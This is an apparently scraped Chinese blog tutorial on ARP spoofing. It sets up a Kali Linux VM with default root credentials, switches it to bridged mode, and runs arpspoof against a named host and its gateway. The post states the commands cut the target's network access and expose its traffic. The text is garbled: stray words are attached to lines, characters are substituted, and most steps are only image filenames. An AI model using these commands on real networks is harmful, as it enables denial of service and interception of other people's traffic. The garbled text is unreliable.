地址解析协议ARP

地址解析协议ARP网络


  1. 准备工做ide

    (1)找到虚拟机Kali-Linux-2.0.0-vm-i686打开blog

      (以本机示例为:计算机 -> F盘 -> 解压Kali-Linux-2.0.0-vm-i686 -> 打开Kali-Linux-2.0.0-vm-i686.vmx -> 开启此虚拟机 -> Username:root -> Password:toor)ci

    (2)重启虚拟机get

    (3)Username:root -> Password:toor 虚拟机

    (4)改为桥接模式it


    wKioL1fiPCCw6-gXAAAOCEbQnhA158.png-wh_50wKioL1fiPCCglsatAAAD6syhiik932.png-wh_50

    wKiom1fiPCGB-6q6AACHSGJzrHY714.png-wh_50

    (5)io

  wKioL1fiPRCAAGB9AAOLQg1lJvg098.png-wh_50

  (6)class

  

  wKioL1fiPbfDCuf1AAAiDxoeqZY192.png-wh_50

  wKiom1fiPaOjsLLEAAAMqHYlsJc404.png-wh_50

  wKioL1fiPrfRHJsWAABgvL-f4bw777.png-wh_50

  wKioL1fiPtrwVP0pAAAJoJOPqBk832.png-wh_50

  wKiom1fiPuuBA3cCAAAEbLmYaD0584.png-wh_50

  

  wKioL1fiPxiR_rhMAAB-SBHu4-0960.png-wh_50

  wKiom1fiPxmzMHZZAAAgcBY0yPQ759.png-wh_50

  (7)右键 -> Open Terminal ->ping一个地址(如:ping 172.28.15.22)(ctrl+c中止)float

  (8)arpspoof -i eth0 -t 172.28.15.133 172.28.15.254(ARP欺骗,做用为断掉了IP地址为172.28.15.133的PC机的网络)

  (9)arpspoof -i eth0 -t 172.28.15.254 172.28.15.133(做用为能够清楚知道IP地址为172.28.15.133的PC机正在用网络作什么)

相关文章
相关标签/搜索